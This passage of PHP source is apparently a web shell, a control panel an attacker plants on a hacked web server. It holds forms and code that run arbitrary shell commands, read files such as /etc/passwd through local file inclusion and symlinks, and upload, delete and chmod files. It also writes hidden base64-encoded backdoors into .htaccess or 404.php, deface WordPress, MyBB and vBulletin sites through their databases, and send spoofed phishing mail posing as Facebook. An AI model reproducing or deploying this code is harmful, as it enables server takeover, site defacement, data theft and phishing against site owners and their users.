  2938. <form action="" method="post">
  2939. <input type="text" value="exploit-db.com" name="site"><input type="submit" name="submit" value="Ex3cut3">
  2940. </form>
  2941. <h2>CMS Fack</h2>
  2942. <span style="font-family:arial;font-size:10px;color:white">wp/mybb/vb<br>
  2943. <form action="" method="post">
  2944. <textarea name="index" style="width:220px;height:100px;color: #00ff00;background-color:#002d00;">Some deface shit in here :P</textarea><br>
  2945. <input type="text" value="host" name="host" style="border-bottom:none"><br><input type="text" name="user" value="user" style="border-bottom:none"><br><input type="text" name="pass" value="pass" style="border-bottom:none"><br><input type="text" name="db" value="database" style="border-bottom:none"><br><input type="text" name="tab" value="table prefix"><br>
  2946. <input type="radio" name="cat" value="wp">wp<input type="radio" name="cat" value="mybb">mybb<input type="radio" name="cat" value="vb">vb<br>
  2947. <span style="font-family:arial;font-size:10px;color:white">vb = update faq, calendar, search<br />wp = update wordpress posts<br>mybb = update mybb index<br>
  2948. <input type="submit" value="Ex3cut3">
  2949. </form><br />
  2950. <?php
  2951. if(isset($_GET['folder'])){
  2952. $chemin=$_GET['folder'];
  2953.  
  2954. $files = glob("$chemin*");
  2955.  
  2956. echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
  2957.  
  2958. foreach ($files as $filename) {
  2959.  
  2960.     echo "<pre>";
  2961.  
  2962.    echo "$filename\n";
  2963.  
  2964.    echo "</pre>";
  2965.  
  2966. }
  2967. }
  2968. else{ ?>
  2969. <h2 style="color:#00cc00;font-size:21px">List Directory</h2>
  2970. <form action="" method="get">
  2971. <input type="text" name="folder" value="/etc/passwd/">
  2972. <input type="submit" value="Ex3cut3">
  2973. <input type="hidden" name="action" value="tools">
  2974. </form>
  2975. <?php }
  2976. if(isset($_GET['hex'])){
  2977. echo '<br /><br /><font color="#00ff00"><b>0x'.bin2hex($_GET['hex']).'</b></font>';
  2978. }
  2979. else{ ?>
  2980. <h2 style="color:#00cc00;font-size:21px">Text 2 Hex</h2>
  2981. <form action="" method="get">
  2982. <input type="text" name="hex" value="abcd">
  2983. <input type="submit" value="Ex3cut3">
  2984. <input type="hidden" name="action" value="tools">
  2985. </form>
  2986. <?php }
  2987. ?>
  2988. <?php
  2989. if(isset($_GET['lfi'])){
  2990. include($_GET['lfi']);
  2991. }
  2992. else{ ?>
  2993. <h2 style="color:#00cc00;font-size:21px">LFI Dude</h2>
  2994. <form action="" method="get">
  2995. <input type="text" name="lfi" value="../../../../../proc/sef/environ">
  2996. <input type="submit" value="Ex3cut3">
  2997. <input type="hidden" name="action" value="tools">
  2998. </form>
  2999. <?php }
  3000. ?>
  3001. </center>
  3002. </div>
  3003. <div>
  3004. <h2>Mail sender</h2>
  3005. <form action="" method="post">
  3006. <font color="orange"><b>Subject:</b></font><br><input type="text" name="subjekti" value="change your password"><br>
  3007. <font color="orange"><b>From:<br></font><input type="text" name="email" value="admin@facebook.com"><br>
  3008. <font color="orange"><b>To:<br></font><input type="text" name="to" value="@"><br>
  3009. <font color="orange"><b>Body:<br></font><textarea style="width:220px;height:100px;color: #00ff00;background-color:#002d00;" name="arsyeja">We made some changes recent days and..</textarea><br>
  3010. <font color="orange"><b>Times:<br></font><input type="text" name="times" value="1" style="width:30px">
  3011. <input type="submit" name="submit" value="send spam">
  3012. </form>
  3013. </div>
  3014. <?php
  3015. if(isset($_GET['cook'])){
  3016. $a = fopen("oncha.php", "w");
  3017. fputs($a, $o);
  3018. fclose($a);
  3019. }
  3020.  
  3021. if(isset($_GET['s-option'])){
  3022. $op = $_GET['s-option'];
  3023. if($op == ".htaccess"){
  3024. $o = stripslashes(base64_decode("IyBPdmVycmlkZSBkZWZhdWx0IGRlbnkgcnVsZSB0byBtYWtlIC5odGFjY2VzcyBmaWxlIGFjY2Vzc2libGUgb3ZlciB3ZWINCjxGaWxlcyB+IFwiXlxcLmh0XCI+DQpPcmRlciBhbGxvdyxkZW55DQpBbGxvdyBmcm9tIGFsbA0KPC9GaWxlcz4NCkFkZFR5cGUgYXBwbGljYXRpb24veC1odHRwZC1waHAgLmh0YWNjZXNzDQoNCiMjIyMjIyBTSEVMTCAjIyMjIyMgPD9waHAgZWNobyBcIlxcblwiO3Bhc3N0aHJ1KCRfR0VUW1wnY1wnXS5cIiAyPiYxXCIpOyA/PiMjIyMjIyBMTEVIUyAjIyMjIyM="));
  3025. $a = fopen(".htaccess", "w");
  3026. fputs($a, $o);
  3027. fclose($a);
  3028. echo 'Visit <a href="http://'.$_SERVER['HTTP_HOST'].'/.htaccess?c=">'.$_SERVER['HTTP_HOST'].'/.htaccess?c=</a>';
  3029. }
  3030. else{
  3031. $o = stripslashes(base64_decode("PD9waHAgc3lzdGVtKCRfR0VUW1wnY1wnXSk7ID8+"));
  3032. $a = fopen("404.php", "w");
  3033. fputs($a, $o);
  3034. fclose($a);
  3035. echo 'Visit <a href="'.$_SERVER['HTTP_HOST'].'/404.php?c=">'.$_SERVER['HTTP_HOST'].'/404.php?c=</a>';
  3036. }
  3037. }
  3038. else{ ?>
  3039. <div>
  3040. <form action="" method="get">
  3041. <h2>Hide Shell</h2>
  3042. <select name="s-option">
  3043. <option>.htaccess</option>
  3044. <option>.php</option>
  3045. </select>
  3046. <input type="hidden" name="action" value="tools">
  3047. <input type="submit" value="Ex3cut3">
  3048. </form>
  3049. </div>
  3050. <?php }
  3051. if(isset($_GET['fp'])){
  3052. $filepath = $_GET['fp'];
  3053. $sitepath = $_GET['sp'];
  3054. $writeblefilepath = 'myfile.txt';
  3055. $flib=$sitepath.$writeblefilepath;
  3056. @unlink($flib);
  3057. symlink($filepath, $flib);
  3058. echo readlink($flib)."\n";
  3059. echo "<textarea cols=30 rows=10>".file_get_contents("http://".$_SERVER['HTTP_HOST']."/".$writeblefilepath)."</textarea>";
  3060. @unlink($flib);
  3061. }
  3062. else{ ?>
  3063. <div>
  3064. <h2>Symlink #2</h2>
  3065. <a href="?action=symlink">__First tool</a><br />
  3066. File path:<br />
  3067. <form action="" method="get">
  3068. <input type="text" name="fp" value="/home/xx/public_html/xx.xx"><br />
  3069. Site path:<br />
  3070. <input type="text" name="sp" value="/home/xx/public_html/"><br />
  3071. <input type="hidden" name="action" value="tools">
  3072. <input type="submit" value="Ex3cut3" style="border-top:0"><br />
  3073. </form>
  3074. </div>
  3075. <?php } ?>
  3076.  
  3077. </div>
  3078. <textarea id="source">
  3079. <?php
  3080. if(isset($_POST['site'])){
  3081. $fuckcloud = dns_get_record($_POST['site'], DNS_TXT);
  3082. print_r($fuckcloud);
  3083.  
  3084. }
  3085.  
  3086. if(isset($_POST['subjekti'])){
  3087.  
  3088. $subject = $_POST['subjekti'];
  3089. $email = $_POST['email'];
  3090. $to = $_POST['to'];
  3091. $comments = $_POST['arsyeja'];
  3092. $times = $_POST['times'];
  3093. for($i=0;$i<$times;$i++){
  3094. if(mail("$to", "$subject", "$comments", "From: $email")){
  3095.     echo "  Sent.";
  3096. }
  3097. else{
  3098. echo "  Not sent!";
  3099. }}}
  3100.  
  3101. if(isset($_POST['index'])){
  3102. $index = mysql_real_escape_string($_POST['index']);
  3103. $host = $_POST['host'];
  3104. $user = $_POST['user'];
  3105. $pass = $_POST['pass'];
  3106. $db = $_POST['db'];
  3107. $tab = $_POST['tab'];
  3108.  
  3109. mysql_connect($host, $user, $pass);
  3110. mysql_select_db($db);
  3111.  
  3112. $cat = $_POST['cat'];
  3113. if($cat == 'wp'){
  3114. mysql_query("UPDATE ".$tab."posts SET post_title='".$index."'");
  3115. echo 'All posts updated :)';
  3116. }
  3117. if($cat == 'mybb'){
  3118. mysql_query("UPDATE ".$tab."templates SET template='".$index."'");
  3119. echo 'Index f@cked :)';
  3120. }
  3121. if($cat == 'vb'){
  3122. mysql_query("UPDATE ".$tab."template SET template ='".$index."' WHERE title ='faq'");
  3123. echo 'faq f@cked :)';
  3124. mysql_query("UPDATE ".$tab."template SET template ='".$index."' WHERE title ='calendar'");
  3125. echo 'calendar f@cked :)';
  3126. mysql_query("UPDATE ".$tab."template SET template ='".$index."' WHERE title ='search'");
  3127. echo 'search f@cked :)';
  3128. }
  3129.  
  3130. }
  3131.  
  3132. echo '</textarea>';
  3133. }
  3134. ?>
  3135. <?php
  3136.  
  3137. if(isset($_GET['action']) && $_GET['action'] == 'files'){
  3138. ?>
  3139. <div id="box"><center><b><i><br>
  3140.  
  3141. <form action="" method="get">
  3142. <font color="orange"><b>&nbsp;&nbsp;&nbsp;&nbsp;Change directory</b></font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type="text" value="<?php if(empty($_GET['go'])){echo getcwd();}else{echo $_GET['go'];} ?>" name="go">
  3143. <input type="hidden" name="action" value="files">
  3144. <input type="submit" value="Ex3cut3">
  3145. </form><br>
  3146. <form action="" method="get">
  3147. <font color="orange"><b>&nbsp;&nbsp;&nbsp;&nbsp;Make directory</b></font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type="text" value="name" name="newdir">
  3148. <input type="hidden" name="go" value="<?php echo getcwd(); ?>">
  3149. <input type="hidden" name="action" value="files">
  3150. <input type="submit" value="Ex3cut3">
  3151. </form><br>
  3152. <?php
  3153. // delete
  3154. if(isset($_GET['delete']) && !empty($_GET['action']) && $_GET['action'] == 'files'){
  3155. $file = $_GET['delete'];
  3156. // if exist
  3157. if(is_dir($file) || file_exists($file)){
  3158. // if file del
  3159. if(!is_dir($file)){
  3160. unlink($file);
  3161. echo '<font color="green">File deleted</font><br>';
  3162. }
  3163. if(is_dir($file)){
  3164. function rmdirs($d) {
  3165.     $f = glob($d . '*', GLOB_MARK);
  3166.     foreach($f as $z){
  3167.         if(is_dir($z)) rmdirs($z);
  3168.         else unlink($z);
  3169.     }
  3170.     if(is_dir($d)) rmdir($d);
  3171. }
  3172. rmdirs($file);
  3173. echo '<font color="green">Folder deleted</font><br>';
  3174. }
  3175.  
  3176. }
  3177. else{
  3178. echo '<font color="red">File or folder does not exist</font><br>';
  3179. }
  3180.  
  3181. }
  3182.  
  3183. // rename
  3184. if(isset($_GET['old_name']) && !empty($_GET['rename_file']) && !empty($_GET['action']) && $_GET['action'] == 'files'){
  3185. $old = $_GET['old_name'];
  3186. $new = $_GET['rename_file'];
  3187. // if new file or folder exist
  3188. if(is_dir($new) || file_exists($new)){
  3189. echo '&nbsp;&nbsp;&nbsp;&nbsp;<font color="red">File or folder exists.</font> <a href="?delete='.$new.'&action=files">delete</a><br>';
  3190. }
  3191. else{
  3192. // if file or folder exist
  3193. if(is_dir($old) || file_exists($old)){
  3194. if(rename($old, $new)){
  3195. if(is_dir($old)){
  3196. echo "<font color=\"green\">Folder renamed sucsessfuly to ".$new."</font>, <a href=\"?view=".$new."\">open</a><br>";
  3197. }
  3198. if(!is_dir($old)){
  3199. echo "<font color=\"green\">File renamed sucsessfuly to ".$new."</font>, <a href=\"?view=".$new."\">open</a><br>";
  3200. }
  3201. }
  3202. else{
  3203. echo "<font color=\"red\">Problem renaming ".$old."</font><br>";
  3204. }
  3205. }
  3206. else{
  3207. echo '&nbsp;&nbsp;&nbsp;&nbsp;<font color="red">File or folder not found.</font><br>';
  3208. }
  3209. }
  3210.  
  3211. }
  3212.  
  3213. if(isset($_GET['rename']) && !empty($_GET['action']) && $_GET['action'] == 'files'){
  3214. $file = $_GET['rename'];
  3215. ?>
  3216. <form action="" method="get">
  3217. Old Name: <input name="old_name" type="text" value="<?php echo $file; ?>"><br>
  3218. Rename to: <input name="rename_file" type="text" value="<?php echo $file; ?>"><br>
  3219. <input type="hidden" name="action" value="files">
  3220. <input type="submit" value="Ex3cut3">
  3221. </form>
  3222. <?php
  3223. }
  3224. // new dir
  3225. if(isset($_GET['go']) && !empty($_GET['newdir']) && !empty($_GET['action']) && $_GET['action'] == 'files'){
  3226. $dir = $_GET['go'];
  3227. $new = $_GET['newdir'];
  3228. $currect = getcwd();
  3229. // if dir is dir
  3230. if(is_dir($dir)){
  3231. // if dir exist
  3232. if(is_dir($new)){
  3233. echo '&nbsp;&nbsp;&nbsp;&nbsp;<font color="red">Directory exist.</font> <a href="?del_dir='.$currect.'\\'.$new.'&action=files">delete</a><br>';
  3234. }
  3235. else{
  3236. if(mkdir($new)){
  3237. echo '&nbsp;&nbsp;&nbsp;&nbsp;<font color="green">Directory created</font><br>';
  3238. }
  3239. else{
  3240. echo '&nbsp;&nbsp;&nbsp;&nbsp;<font color="red">Problem creating directory</font><br>';
  3241. }
  3242. if(!is_dir($dir)){
  3243. chdir($go);
  3244. if(mkdir($new)){
  3245. echo '&nbsp;&nbsp;&nbsp;&nbsp;<font color="green">Directory created</font><br>';
  3246. }
  3247. else{
  3248. echo '&nbsp;&nbsp;&nbsp;&nbsp;<font color="red">Problem creating directory</font><br>';
  3249. }
  3250. }
  3251.  
  3252. }
  3253. }
  3254. }
  3255.  
  3256. // file browser
  3257. $self = $_SERVER['PHP_SELF'];
  3258. $dir = getcwd();
  3259.     if(isset($_GET['go']))
  3260.     {
  3261.         $dir = $_GET['go'];
  3262.     }
  3263.    
  3264.     if(is_dir($dir))
  3265.     {
  3266.         $handle = opendir($dir);
  3267.         {
  3268.        
  3269.                 showDrives();
  3270.                 ?>
  3271.                 <br>
  3272.                 &nbsp;&nbsp;&nbsp;&nbsp;&#171;<a style="color:red" href="<?php echo $_SERVER['PHP_SELF'].'?action=files&go='.getcwd(); ?>/../">BACK</a>&nbsp;&nbsp;&nbsp;&nbsp;
  3273.                 <a style="color:red" href="<?php echo $_SERVER['HTTP_REFERER']; ?>">&nbsp;&nbsp;&nbsp;&nbsp;FORWARD</a>&nbsp;&nbsp;&#187;<br>
  3274. <br><br><hr><br><br>
  3275.                 <?php
  3276.         if($dir[(strlen($dir)-1)] != '/'){$dir = $dir.'/';}
  3277.         while (($file = readdir($handle)) != false) {
  3278.                 if ($file != "." && $file != "..")
  3279.             {
  3280.        
  3281.         $color = 'red';
  3282.         if(is_readable($dir.$file))
  3283.         {
  3284.             $color = 'yellow';
  3285.         }
  3286.         if(is_writable($dir.$file))
  3287.         {
  3288.             $color = '#00ff00';
  3289.         }
  3290.                 if(is_dir($dir.$file))
  3291.                 {
  3292.                     ?>
  3293.                     <span id="onmouseover">
  3294.                     <a  style="font-size:12px;font-family:sans-serif;color: <?php echo $color?>;" href="<?php echo $self ?>?go=<?php echo $dir.$file ?>&action=files"><b>[ <font color="pink"><?php echo $file ?></font> ]</b></a>
  3295.                     <?php echo HumanReadableFilesize(dirSize($dir.$file));?>
  3296.                     <font color="pink"><?php echo getFilePermissions($dir.$file);?></font> <font color="#666">> </font><?php echo getperms($dir); ?>
  3297.                     <a id="za" style="margin-right:30px" href="<?php echo $self;?>?delete=<?php echo $dir.$file;?>&action=files">Delete</a>
  3298.                     <a id="za" style="margin-right:10px" href="<?php echo $self;?>?action=files&rename=<?php echo $dir.$file;?>">Rename</a>
  3299.                 <a id="za" style="margin-right:10px" href="<?php echo $self;?>?zip=<?php echo $dir.$file;?>&action=files">Download</a>
  3300.                     <a id="za" style="margin-right:25px" href="<?php echo $self;?>?action=upload&path=<?php echo $dir.$file;?>">Upload</a><br>
  3301.                     </span>
  3302.                 <?php
  3303.                 }
  3304.                 //Its a file
  3305.                 else
  3306.                 {
  3307.                     ?>
  3308.                     <span id="onmouseover">
  3309.                     <a style="font-family: Optima, Segoe, "Segoe UI", Candara, Calibri, Arial, sans-serif;color: <?php echo $color?>;" href='<?php echo $self ?>?view=<?php echo $dir.$file ?>'><?php echo $file ?></a>
  3310.                     <font color="orange"><?php echo HumanReadableFilesize(filesize($dir.$file));?></font>
  3311.                     <font color="yellow"><?php echo getFilePermissions($dir.$file);?></font> <font color="#666">> </font><?php echo getperms($dir.$file); ?>
  3312.                     <a id="za" style="margin-right:30px" href="<?php echo $self;?>?delete=<?php echo $dir.$file;?>&action=files">Delete</a>
  3313.                     <a id="za" style="margin-right:10px" href="<?php echo $self;?>?action=files&rename=<?php echo $dir.$file;?>">Rename</a>
  3314.                 <a id="za" style="margin-right:10px" href="<?php echo $self;?>?zip=<?php echo $dir.$file;?>">Download</a><br>
  3315.                     </span>
  3316.                     <?php
  3317.                 }
  3318.             }
  3319.         }
  3320.         closedir($handle);
  3321.         }
  3322.     }
  3323.     else
  3324.     {
  3325.         echo "<p class='alert_red' id='margins'>Permission Denied</p>";
  3326.     }
  3327.  
  3328.  
  3329. ?>
  3330. </i></b></center></div>
  3331. <?php
  3332. }
  3333. ?>
  3334. <br><br>
  3335. <?php
  3336. if(!isset($_GET['action']) && !isset($_GET['upload']) && !isset($_GET['get']) && !isset($_GET['turnoff']) && !isset($_GET['view']) && !isset($_GET['db'])){
  3337. ?>
  3338. <center><b><i><font color=lime><div id="commands">
  3339. <form action="" method="get">
  3340. <font color="orange"><b>Execute command</b></font> <input type="text" name="command" value="ls -la">
  3341. <input type="submit" value="Ex3cut3">
  3342. </form><br>
  3343. <form action="" method="get">
  3344. <font color="orange"><b>Ready commands</b></font>
  3345. <select name="command">
  3346.   <option>whoami</option>
  3347.   <option>netstat -an</option>
  3348.   <option>ls -la</option>
  3349.   <option>ls</option>
  3350.   <option>uname -a</option>
  3351.   <option>dir</option>
  3352.   <option>start cmd.exe</option>
  3353.   <option>cat /etc/passwd</option>
  3354.   <option>cat /etc/hosts</option>
  3355.   <option>ls /var/mail</option>
  3356. </select>
  3357. <input type="submit" value="Ex3cut3">
  3358. </form><br>
  3359. <form method="get">
  3360. <font color="orange"><b>Create file &nbsp; </b></font> <input type="text" id="move" name="make">
  3361. <input type="submit" value="Ex3cut3">
  3362. </form><br>
  3363. <form action="" method="get">
  3364. <font color="orange"><b>Chmod file &nbsp; </b></font> <input type="text" name="thefile" value="File Name" style="width:110px">
  3365. <input type="text" name="thefileval" value="0777" style="width:44px">
  3366. <input type="submit" value="Ex3cut3"> <span style="color: orange;font-family: Tahoma, Geneva, sans-serif;font-size:12px;"> ~~~~ </span>
  3367. <select name="comm">
  3368. <option>chmod</option>
  3369. <option>chown</option>
  3370. <option>chgrp</option>
  3371. </select>
  3372. </form><br>
  3373. <form action="" method="get">
  3374. <font color="orange"><b>Passthru </b></font> <input type="text" name="thepass" value="whoami">
  3375. <input type="submit" value="Ex3cut3">
  3376. </form><br>
  3377. <form action="" method="get">
  3378. <font color="orange"><b>Exec&nbsp; </b></font> <input type="text" name="theexec" value="whoami">
  3379. <input type="submit" value="Ex3cut3">
  3380. </form><br>
  3381. <form action="" method="get">
  3382. <font color="orange"><b>Popen&nbsp; </b></font> <input type="text" name="popen" value="start cmd.exe">
  3383. <input type="submit" value="Ex3cut3">
  3384. </form></font></i></b></center><br>
  3385.  
  3386. <?php
  3387. }
  3388.  
  3389. if(isset($_GET['thepass'])){
  3390. echo '<textarea id="sourcea">';
  3391. passthru($_GET['thepass']);
  3392. echo '</textarea>';
  3393. }
  3394. if(isset($_GET['theexec'])){
  3395. echo '<textarea id="sourcea">';
  3396. if(!function_exists('exec')){
  3397. die('Exec command is blocked blocked by admin');
  3398. }
  3399. else{
  3400. echo exec($_GET['theexec']);
  3401. echo '</textarea>';
  3402. }
  3403. }
  3404. if(isset($_GET['popen'])){
  3405. echo '<textarea id="sourcea">';
  3406. if(!function_exists('popen')){
  3407. die('Popen command is blocked blocked by admin');
  3408. }
  3409. else{
  3410. popen($_GET['popen'], "r");
  3411. echo '</textarea>';
  3412. }
  3413. }
  3414.  
  3415. if(isset($_GET['thefile'])){
  3416. $file = $_GET['thefile'];
  3417. $new = $_GET['thefileval'];
  3418.         if($_GET['comm'] == 'chmod')
  3419.         {
  3420.             $ch_ok = chmod($file,$new);
  3421.             echo "Permission Changed.";
  3422.         }
  3423.         else if($_GET['comm'] == 'chown')
  3424.         {
  3425.             $ch_ok = chown($file,$new);
  3426.             echo "Owner Changed.";
  3427.         }
  3428.         else if($_GET['comm'] == 'chgrp')
  3429.         {
  3430.             $ch_ok = chgrp($file,$new);
  3431.             echo "Group Changed.";
  3432.         }
  3433. }
  3434.  
  3435.  
  3436. if(isset($_FILES['upload'])){
  3437. //file upload
  3438.     echo '<center>';
  3439. if(isset($_POST['location']) && !empty($_POST['location'])){
  3440. $target_path = $_POST['location'];
  3441. $target_path = $target_path.'/';
  3442. }
  3443. else{
  3444. $target_path = "";
  3445. }
  3446. echo "<font color=\"green\">File ".basename($_FILES["upload"]["name"])."</font> uploaded.<br>";
  3447. if(move_uploaded_file($_FILES["upload"]["tmp_name"], $target_path . $_FILES["upload"]["name"])){
  3448.     echo "The file ".basename($_FILES["upload"]["name"]).
  3449.     " has been uploaded";
  3450. } else{
  3451.     echo "There was an error uploading the file, please try again!";
  3452. }
  3453.     echo '</center>';
  3454. }
  3455.  
  3456. if(isset($_GET['dirmake'])){
  3457. // change directory
  3458. $dir = $_GET['dirmake'];
  3459. ?><font color="#228B22">Command executed</font><br> <font color="orange">
  3460. <?php
  3461. echo '<b>Last dir:</b></font><font color="yellow"> '.getcwd() . "</font><br>";
  3462.  
  3463. chdir($dir);
  3464.  
  3465. // current directory
  3466. echo '<b>New dir:</b></font><font color="yellow"> '.getcwd() . "</font><br>";
  3467. ?>
  3468. <?php
  3469. }
  3470.  
  3471. if(isset($_GET['command'])){
  3472. $command = $_GET['command'];
  3473. if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
  3474. if(preg_match("/ls/", $command)||preg_match("/cat/", $command)||preg_match("/grep/", $command)||preg_match("/wget/", $command)||preg_match("/apt-get/", $command)||preg_match("/install/", $command)||preg_match("/mkdir/", $command)){
  3475.     echo '<font color="#A52A2A"><b>This command dont work on windows!</b></font> ';
  3476.     }
  3477. }
  3478. if (strtoupper(substr(PHP_OS, 0, 3)) === 'UNI') {
  3479. if(preg_match("/ls/", $command)||preg_match("/tree/", $command)||preg_match("/cd../", $command)){
  3480.     echo '<font color="#A52A2A"><b>This command dont work on linux!</b></font> ';
  3481.     }
  3482. }
  3483. ?>
  3484. <textarea id="sourcea">
  3485. <?php
  3486. system($command);
  3487. ?>
  3488. </textarea></div>
  3489. <?php
  3490. }
  3491. ?>
  3492. <?php
  3493. // ============================
  3494. // get action
  3495. // ============================
  3496. if(isset($_GET['action']) && !empty($_GET['action'])){
  3497. $action = $_GET['action'];
  3498. if($action == "phpinfo"){
  3499. phpinfo();
  3500. }
  3501.  
  3502. if($action == 'upload'){
  3503.     ?>
  3504.     <center>
  3505. <form action="" method="post" enctype="multipart/form-data">
  3506. <font color="orange"><b>Upload file</b></font> <input type="file" name="upload"> <b>Upload to</b> <input type="text" name="location" value="<?php if(isset($_GET['path'])){echo $_GET['path'];} ?>">
  3507. <input type="submit" value="Ex3cut3">
  3508. </form><br></center>
  3509. <?php
  3510. }
  3511.  
  3512. }
  3513.  
  3514.  
  3515. echo'<div id="tbl" class="tbl" style="display:none;">
  3516.  
  3517. <div class="filetable">
  3518.  
  3519. <div class="tblcnt" style="width:220px;">Name</div>
  3520.  
  3521. <div class="tblcnt" style="width:80px;">Size</div>
  3522.  
  3523. <div class="tblcnt" style="width:100px;">Modify</div>
  3524.  
  3525. <div class="tblcnt" style="width:100px;">Owner</div>
  3526.  
  3527. <div class="tblcnt" style="width:100px;">Permission</div>
  3528.  
  3529. <div class="tblcnt" style="width:80px;">Action</div>
  3530.  
  3531. </div>
  3532.  
  3533. <div id="filest"></div>
  3534.  
  3535. <div style="clear:both;"></div>
  3536.  
  3537.  
  3538.  
  3539. </div>
  3540.  
  3541.  
  3542.  
  3543. <div id="inject" class="tbl" style="display:none;">
  3544.  
  3545. <div class="filetable">
  3546.  
  3547. <div class="tblcnt" style="width:200px; cursor:pointer;" onClick="doSlct();">User</div>
  3548.  
  3549. <div class="tblcnt" style="width:220px;">Sitename</div>
  3550.  
  3551. <div class="tblcnt" style="width:160px;">CMS</div>
  3552.  
  3553. <div class="tblcnt" style="width:120px;">Status</div>
  3554.  
  3555. </div>
  3556.  
  3557. <div id="injtbl"></div>
  3558.  
  3559. <div style="clear:both;"></div>
  3560.  
  3561.  
  3562.  
  3563. </div>
  3564.  
  3565.  
  3566.  
  3567. <div id="infobox" style="display:none;"><div class="infotitle"><a href="" onclick="$(\'#infobox\').hide();return false;" style="color:black;">[-]</a> <span id="infotitle">Information</span></div><div class="infotxt" id="infotxt"></div></div>
  3568.  
  3569. <script>
  3570.  
  3571.  
  3572.  
  3573. var sidebar = false;
  3574.  
  3575. var sidebar2 = false;
  3576.  
  3577. function sidebarz(){
  3578.  
  3579. $(\'#logo\').hide();
  3580.  
  3581. if(sidebar){
  3582.  
  3583. $(\'#smnu\').hide();
  3584.  
  3585. sidebar = false;
  3586.  
  3587. }else{
  3588.  
  3589. $(\'#smnu\').show();
  3590.  
  3591. sidebar = true;
  3592.  
  3593. }
  3594.  
  3595. }
  3596.  
  3597. function sidebarz2(){
  3598.  
  3599. if(sidebar2){
  3600.  
  3601. $(\'#smnu2\').hide();
  3602.  
  3603. sidebar2 = false;
  3604.  
  3605. }else{
  3606.  
  3607. $(\'#smnu2\').show();
  3608.  
  3609. sidebar2 = true;
  3610.  
  3611. }
  3612.  
  3613. }
  3614.  
  3615.  
  3616.  
  3617. function filebrs(val){
  3618.  
  3619. hideAll();
  3620.  
  3621. $(\'#status\').html(\'Status: Requesting...\');
  3622.  
  3623. $.post("", { ac: "browse", path: val},
  3624.  
  3625. function(data) {
  3626.  
  3627. $(\'#tbl\').show();
  3628.  
  3629. $(\'#status\').html(\'Status: Completed (:\');
  3630.  
  3631. $(\'#filest\').html(data);
  3632.  
  3633. });
  3634.  
  3635. }
  3636.  
  3637. function doUpdt(val){
  3638.  
  3639. var refreshId = setInterval(function() {
  3640.  
  3641.      $("#injtbl").load(\'rootinject.tmp\');
  3642.  
  3643.   }, 5000);
  3644.  
  3645.   $.ajaxSetup({ cache: false });
  3646.  
  3647.  
  3648.  
  3649. hideAll();
  3650.  
  3651. $(\'#inject\').show();
  3652.  
  3653. $(\'#status\').html(\'Status: Requesting...\');
  3654.  
  3655. $.post("", { ac: val},
  3656.  
  3657. function(data) {
  3658.  
  3659. refreshId = "";
  3660.  
  3661. $(\'#sidebar2\').show();
  3662.  
  3663. $(\'#status\').html(\'Status: Completed (:\');
  3664.  
  3665. $(\'#injtbl\').html(data);
  3666.  
  3667. });
  3668.  
  3669.  
  3670.  
  3671. }
  3672.  
  3673.  
  3674.  
  3675. function hideAll(){
  3676.  
  3677. k1 = 0;
  3678.  
  3679. k2 = 0;
  3680.  
  3681. $(\'#sidebar2\').hide();
  3682.  
  3683. $(\'#tbl\').hide();
  3684.  
  3685. $(\'#inject\').hide();
  3686.  
  3687. $(\'#infobox\').hide();
  3688.  
  3689. $(\'#sshbox\').hide();
  3690.  
  3691. }
  3692.  
  3693.  
  3694.  
  3695. function doReq(val){
  3696.  
  3697. hideAll();
  3698.  
  3699. $(\'#inject\').show();
  3700.  
  3701. $(\'#status\').html(\'Status: Requesting...\');
  3702.  
  3703. $.post("", { ac: val},
  3704.  
  3705. function(data) {
  3706.  
  3707. $(\'#sidebar2\').show();
  3708.  
  3709. $(\'#status\').html(\'Status: Completed (:\');
  3710.  
  3711. $(\'#injtbl\').html(data);
  3712.  
  3713. });
  3714.  
  3715. }
  3716.  
  3717.  
  3718.  
  3719. function doReq2(val){
  3720.  
  3721. hideAll();
  3722.  
  3723. $(\'#status\').html(\'Status: Requesting...\');
  3724.  
  3725. $.post("", { ac: val},
  3726.  
  3727. function(data) {
  3728.  
  3729. $(\'#infobox\').show();
  3730.  
  3731. $(\'#status\').html(\'Status: Completed (:\');
  3732.  
  3733. $(\'#infotxt\').html(data);
  3734.  
  3735. });
  3736.  
  3737. }
  3738.  
  3739.  
  3740.  
  3741. //Js Multi thread post request by Elo (:
  3742.  
  3743. var k1 = 1; var k2 = 0; var req_limit = 9;
  3744.  
  3745. function doInject(){
  3746.  
  3747. var i = 0; var j = 0;
  3748.  
  3749. $(\'.conf\').each(function(){
  3750.  
  3751. i += 1;
  3752.  
  3753. var id = $(this).attr(\'title\');
  3754.  
  3755.  
  3756.  
  3757. if(id > k1){
  3758.  
  3759. j += 1; k1 += 1;
  3760.  
  3761. var link = $(this).attr(\'href\');
  3762.  
  3763.  
  3764.  
  3765. var domain = $(\'#inj_dom\' + id).html();
  3766.  
  3767. var cms = $(this).html();
  3768.  
  3769. doPost2(link,cms,id,domain);
  3770.  
  3771. }
  3772.  
  3773. if(j > req_limit){return false;}
  3774.  
  3775.  
  3776.  
  3777.  
  3778.  
  3779. });
  3780.  
  3781. }
  3782.  
  3783.  
  3784.  
  3785.  
  3786.  
  3787.  
  3788.  
  3789. function doPost2(link,cmz,id,dmn){
  3790.  
  3791. if($(\'#injchk\'+id).is(\':checked\')){
  3792.  
  3793. $(\'#inj_status\' + id).html(\'Injecting...\');
  3794.  
  3795. $.ajax({
  3796.  
  3797.  url: "",
  3798.  
  3799.  type: "POST",
  3800.  
  3801.  timeout: 60000,
  3802.  
  3803.  data: {ac: "inject", conf: link, domain: dmn, cms: cmz, ignore_def: $(\'#ignore_def:checked\').val(), n404_php: $(\'#404_php:checked\').val(), nindex_php: $(\'#index_php:checked\').val(), nhome_php: $(\'#home_php:checked\').val(), narchive_php: $(\'#archive_php:checked\').val(), ncomment_php: $(\'#comment_php:checked\').val(), com_install: $(\'#use_com:checked\').val(), deface_page: $(\'#deface_page\').val()},
  3804.  
  3805.  dataType: "text"
  3806.  
  3807. }).done(function(msg) {
  3808.  
  3809.  
  3810.  
  3811. k2 += 1;
  3812.  
  3813.  
  3814.  
  3815. $(\'#inj_status\' + id).html(\'Parse Error\');
  3816.  
